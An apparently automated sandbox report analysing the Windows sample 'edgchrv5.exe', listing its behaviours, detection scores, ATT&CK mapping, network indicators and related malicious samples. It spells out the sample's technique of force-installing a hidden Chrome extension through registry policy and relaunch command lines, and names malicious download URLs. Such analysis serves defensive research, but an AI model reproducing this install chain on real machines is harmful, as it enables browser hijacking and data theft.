Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8Jump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_01
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\edgchrv5.exeFile created: C:\Users\user\AppData\Local\ServiceAppJump to behavior
Source: edgchrv5.exeString found in binary or memory: %s\ServiceApp\apps-helper\web.js
Source: edgchrv5.exeString found in binary or memory: %s\ServiceApp\apps-helper
Source: edgchrv5.exeString found in binary or memory: %s\ServiceApp\apps-helper\edge.crx
Source: edgchrv5.exeString found in binary or memory: %s\ServiceApp\apps-helper\manifest.json
Source: edgchrv5.exeString found in binary or memory: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble
Source: edgchrv5.exeString found in binary or memory: %s\ServiceApp\apps-helper\service.js
Source: classification engineClassification label: mal48.phis.winEXE@37/11@14/12
Source: C:\Users\user\Desktop\edgchrv5.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: edgchrv5.exeStatic PE information: certificate valid
Source: edgchrv5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: edgchrv5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: edgchrv5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: edgchrv5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: edgchrv5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: edgchrv5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: edgchrv5.exeStatic PE information: real checksum: 0x39bd8 should be: 0x3d11c
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01003EDD push ecx; ret 0_2_01003EF0
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01008CE5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_01008CE5
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubbleJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\edgchrv5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-9971
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01001740 SHGetSpecialFolderPathW,GetFileAttributesW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,FindNextFileW,Sleep,GetFileAttributesW,Sleep,Sleep,Sleep,FindNextFileW,FindClose,_memset,GetFileAttributesW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,FindNextFileW,Sleep,Sleep,Sleep,0_2_01001740
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01001F50 SHGetSpecialFolderPathW,_memset,FindFirstFileW,_memset,GetFileAttributesW,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_01001F50
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_0100180C RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_0100180C
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01002B7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_01002B7C
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01008CE5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_01008CE5
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01002B7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_01002B7C
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01009DF6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_01009DF6
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01005256 SetUnhandledExceptionFilter,0_2_01005256
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01004293 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_01004293
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exeJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /TJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.phpJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubbleJump to behavior
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: GetLocaleInfoA,0_2_0100B152
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01001410 cpuid 0_2_01001410
Source: C:\Users\user\Desktop\edgchrv5.exeCode function: 0_2_01005A98 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_01005A98

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\Desktop\edgchrv5.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\chrome\ExtensionInstallForcelistJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation
11
Browser Extensions
11
Process Injection
1
Masquerading
1
Input Capture
1
System Time Discovery
Remote Services1
Input Capture
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
Command and Scripting Interpreter
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory1
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
Exfiltration Over Bluetooth3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts2
Native API
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares1
Man in the Browser
Automated Exfiltration4
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS23
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer5
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 886159 Sample: edgchrv5.exe Startdate: 12/06/2023 Architecture: WINDOWS Score: 48 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Machine Learning detection for sample 2->42 7 edgchrv5.exe 4 9 2->7         started        process3 signatures4 44 Modifies Chrome's extension installation force list 7->44 10 chrome.exe 7->10         started        13 taskkill.exe 1 7->13         started        15 taskkill.exe 1 7->15         started        17 chrome.exe 7->17         started        process5 dnsIp6 34 192.168.2.1 unknown unknown 10->34 36 239.255.255.250 unknown Reserved 10->36 19 chrome.exe 10->19         started        22 conhost.exe 13->22         started        24 conhost.exe 15->24         started        26 chrome.exe 17->26         started        process7 dnsIp8 28 api4.ipify.org 173.231.16.76, 443, 49705 WEBNXUS United States 19->28 30 s4.histats.com 149.56.240.132, 443, 49712, 49713 OVHFR Canada 19->30 32 15 other IPs or domains 19->32

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
edgchrv5.exe29%ReversingLabsWin32.Trojan.Generic
edgchrv5.exe35%VirustotalBrowse
edgchrv5.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
campaignkeepy.buzz0%VirustotalBrowse
getfiles.wiki2%VirustotalBrowse
exturl.com0%VirustotalBrowse
campaignkejfcv.buzz0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://getfiles.wiki/welcome.php~0%Avira URL Cloudsafe
https://campaignkejfcv.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONAL0%Avira URL Cloudsafe
https://campaignkejfcv.buzz/0%Avira URL Cloudsafe
https://getfiles.wiki/welcome.php&Svh&0%Avira URL Cloudsafe
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=100%Avira URL Cloudmalware
https://getfiles.wiki/favicon.ico0%Avira URL Cloudsafe
https://getfiles.wiki/welcome.phpFp10%Avira URL Cloudsafe
https://getfiles.wiki/welcome.php%s0%Avira URL Cloudsafe
https://getfiles.wiki/welcome.phpX0%Avira URL Cloudsafe
https://campaignkeepy.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONAL0%Avira URL Cloudsafe
https://campaignkeepy.buzz/0%Avira URL Cloudsafe
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=100%Avira URL Cloudmalware
https://getfiles.wiki/redirect.php100%Avira URL Cloudmalware
https://exturl.com/r.php?key=pvwarw30%Avira URL Cloudsafe
https://getfiles.wiki/welcome.php100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    accounts.google.com
    216.58.215.237
    truefalse
      high
      api4.ipify.org
      173.231.16.76
      truefalse
        high
        campaignkeepy.buzz
        38.128.66.115
        truefalseunknown
        getfiles.wiki
        188.114.97.7
        truefalseunknown
        t.dtscout.com
        141.101.120.10
        truefalse
          high
          www3.l.google.com
          142.250.203.110
          truefalse
            high
            s4.histats.com
            149.56.240.132
            truefalse
              high
              campaignkejfcv.buzz
              38.128.66.115
              truefalseunknown
              e.dtscout.com
              141.101.120.10
              truefalse
                high
                www.google.com
                216.58.215.228
                truefalse
                  high
                  clients.l.google.com
                  172.217.168.14
                  truefalse
                    high
                    exturl.com
                    38.128.66.115
                    truefalseunknown
                    clients2.google.com
                    unknown
                    unknownfalse
                      high
                      chrome.google.com
                      unknown
                      unknownfalse
                        high
                        api.ipify.org
                        unknown
                        unknownfalse
                          high
                          s10.histats.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://campaignkejfcv.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONALfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://t.dtscout.com/pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.cfalse
                              high
                              https://api.ipify.org/?format=jsonp&callback=getIPfalse
                                high
                                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                  high
                                  https://chrome.google.com/webstore/inlineinstall/detail/ecffbknobglofafinobbcmaionnihcmafalse
                                    high
                                    https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=false
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@wfalse
                                      high
                                      https://getfiles.wiki/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://campaignkeepy.buzz/r.php?payout=OPTIONAL&cnv_id=OPTIONALfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                        high
                                        https://getfiles.wiki/redirect.phpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.phpfalse
                                          high
                                          https://exturl.com/r.php?key=pvwarw3false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://getfiles.wiki/welcome.phpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://a.nel.cloudflare.com/report/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3false
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://api.ipify.org?format=jsonp&callback=getIPchromecache_131.4.drfalse
                                              high
                                              https://getfiles.wiki/welcome.php~edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://getfiles.wiki/welcome.php&Svh&edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://campaignkejfcv.buzz/chromecache_132.4.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://t.dtscout.com/pv/chromecache_133.4.drfalse
                                                high
                                                https://getfiles.wiki/welcome.php%sedgchrv5.exe, 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://getfiles.wiki/welcome.phpFp1edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://getfiles.wiki/welcome.phpXedgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://campaignkeepy.buzz/chromecache_132.4.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://getfiles.wiki/redirect.php?gjhagdjfbdjk=chromecache_131.4.drfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                216.58.215.228
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                141.101.120.10
                                                t.dtscout.comEuropean Union
                                                13335CLOUDFLARENETUSfalse
                                                216.58.215.237
                                                accounts.google.comUnited States
                                                15169GOOGLEUSfalse
                                                149.56.240.132
                                                s4.histats.comCanada
                                                16276OVHFRfalse
                                                38.128.66.115
                                                campaignkeepy.buzzUnited States
                                                63023AS-GLOBALTELEHOSTUSfalse
                                                142.250.203.110
                                                www3.l.google.comUnited States
                                                15169GOOGLEUSfalse
                                                188.114.97.7
                                                getfiles.wikiEuropean Union
                                                13335CLOUDFLARENETUSfalse
                                                172.217.168.14
                                                clients.l.google.comUnited States
                                                15169GOOGLEUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                35.190.80.1
                                                a.nel.cloudflare.comUnited States
                                                15169GOOGLEUSfalse
                                                173.231.16.76
                                                api4.ipify.orgUnited States
                                                18450WEBNXUSfalse
                                                IP
                                                192.168.2.1
                                                Joe Sandbox Version:37.1.0 Beryl
                                                Analysis ID:886159
                                                Start date and time:2023-06-12 19:06:06 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 4m 58s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:edgchrv5.exe
                                                Detection:MAL
                                                Classification:mal48.phis.winEXE@37/11@14/12
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 73.5% (good quality ratio 67.5%)
                                                • Quality average: 74.9%
                                                • Quality standard deviation: 30.8%
                                                HCA Information:
                                                • Successful, ratio: 97%
                                                • Number of executed functions: 34
                                                • Number of non-executed functions: 10
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 216.58.215.227, 34.104.35.123, 104.20.5.29, 104.20.4.29
                                                • Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, s10.histats.com.cdn.cloudflare.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                19:07:02API Interceptor1x Sleep call for process: edgchrv5.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                141.101.120.10TeamViewer 15.40.exeGet hashmaliciousUnknownBrowse
                                                  https://sicurezza.info.85-217-144-202.cprapid.com/22-23app/Get hashmaliciousUnknownBrowse
                                                    http://www.sihebshost.com/pp-app/login/accedi.phpGet hashmaliciousUnknownBrowse
                                                      https://claimnow12.finance.blog/cara-credit-union/Get hashmaliciousUnknownBrowse
                                                        http://securelogin.185-254-37-231.cprapid.com/itGet hashmaliciousUnknownBrowse
                                                          http://law.jaknet.my.idGet hashmaliciousUnknownBrowse
                                                            https://verifica.dati.79-137-206-206.cprapid.com/dp/Get hashmaliciousUnknownBrowse
                                                              $RLFVMMG.exeGet hashmaliciousUnknownBrowse
                                                                http://s953497062.onlinehome.us/fixit?_recovrAccountGet hashmaliciousUnknownBrowse
                                                                  http://148.69.140.59:88/dak.phpGet hashmaliciousUnknownBrowse
                                                                    https://certificate.dokument.35-158-186-246.cprapid.com/id/dklogin.phpGet hashmaliciousUnknownBrowse
                                                                      149.56.240.132https://city-of-goodyear.webnode.page/Get hashmaliciousUnknownBrowse
                                                                        38.128.66.115TeamViewer 15.40.exeGet hashmaliciousUnknownBrowse
                                                                          TriMPFPatch56form20230426.exeGet hashmaliciousUnknownBrowse
                                                                            luxor - pharaoh's challenge.exeGet hashmaliciousUnknownBrowse
                                                                              $RDGU87D.exeGet hashmaliciousUnknownBrowse
                                                                                $RLFVMMG.exeGet hashmaliciousUnknownBrowse
                                                                                  inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                    inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                      inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                        inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                          inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                            Your File Is Ready To Download.exeGet hashmaliciousUnknownBrowse
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              getfiles.wikiTeamViewer 15.40.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.7
                                                                                              TriMPFPatch56form20230426.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              luxor - pharaoh's challenge.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.7
                                                                                              $RDGU87D.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              $RLFVMMG.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              inno-chrome-malware.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              Your File Is Ready To Download.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              campaignkeepy.buzzTeamViewer 15.40.exeGet hashmaliciousUnknownBrowse
                                                                                              • 38.128.66.115
                                                                                              api4.ipify.orgINV67758ASP1_and_Bank_details.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              mMG78nF0L2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 64.185.227.155
                                                                                              39MHMKDcWF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              Listed_specification.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              hesaphareketi-01.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 173.231.16.76
                                                                                              INVIbwZyQ2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              3t7DoZ25Dn.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              Doc_206410002pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              Purchase_Order_2023.0608.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              shipping_documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              Transfer_copy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              SWIFT_COPY.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                              • 104.237.62.211
                                                                                              SWIFT_56650XXXX_0716NSMI0015024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              Quote_EM092723.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 104.237.62.211
                                                                                              Order_confirmation_#872635.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              hqz11PiSIS.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 64.185.227.155
                                                                                              Halkbank_Ekstre_20230906_081655_924962.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              DQ0LGV4D8v.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              4S1jIYaMSJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              DHL_-_OVERDUE_ACCOUNT_NOTICE_-_8311493658_PDF.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 64.185.227.155
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUShttps://filehippo.com/download_xumouseGet hashmaliciousRedAlertBrowse
                                                                                              • 104.18.25.173
